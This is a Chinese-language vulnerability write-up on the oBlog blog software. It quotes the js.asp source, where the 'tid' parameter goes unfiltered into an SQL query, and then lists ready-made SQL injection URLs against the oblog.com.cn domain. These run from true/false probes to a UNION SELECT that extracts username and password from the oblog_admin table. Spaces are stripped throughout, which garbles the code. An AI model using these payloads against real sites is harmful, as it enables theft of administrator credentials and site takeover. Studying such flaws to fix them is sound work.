来源:DeepenStudy 漏洞文件:js.asp <% Dimoblog setoblog=newclass_sys oblog.autoupdate=False oblog.start dimjs_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request(”n”)) ifn=0thenn=1 selectcaseCInt(Request(”j”)) case1 calltongji() case2 calltopuser() case3 calladduser() case4 calllistclass() case5 callshowusertype() case6 calllistbestblog() case7 callshowlogin() case8 callshowplace() case9 callshowphoto() case10 callshowblogstars() Case11 Callshow_hotblog() Case12 Callshow_teams() Case13 Callshow_posts() Case14 Callshow_hottag() case0 callshowlog() endselect ****************省略部分代码****************** Subshow_posts() Dimteamid,postnum,l,u,t teamid=Request(”tid”) postnum=n l=CInt(Request(”l”)) u=CInt(Request(”u”)) t=CInt(Request(”t”)) Dimrs,sql,sRet,sAddon Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0” Ifteamid<>“”Andteamid<>“0″Then teamid=Replace(teamid,”|”,”,”) Sql=Sql&”AndteamidIn(”&teamid&“)” EndIf Sql=Sql&”orderbypostidDesc” Setrs=oblog.Execute(Sql) sRet=” ” DoWhileNotrs.Eof sAddon=”\” *sRet=sRet&“”&oblog.Filt_html(Left(rs(2),l))&“” Ifu=1ThensAddon=rs(4) ift=1Then IfsAddon<>“”ThensAddon=sAddon&“,” sAddon=sAddon&rs(3) EndIf IfsAddon<>“”ThensAddon=”(”&sAddon&“)” sRet=sRet&sAddon&“ ” rs.Movenext Loop Setrs=Nothing sRet=sRet&“ ” Response.writeoblog.htm2js(sRet,True) EndSub 调用show_posts()过程必须要符合上面的参数n=1,j=13 (”&teamid&“) http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1返回正常 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2返回异常 猜管理员表名 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and查询语句and(1=1 Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0” http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1 document.write(\’ * ‘); gid=1跟pid=2里的1,2就是了直接替换里面的1,2为username,password http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1
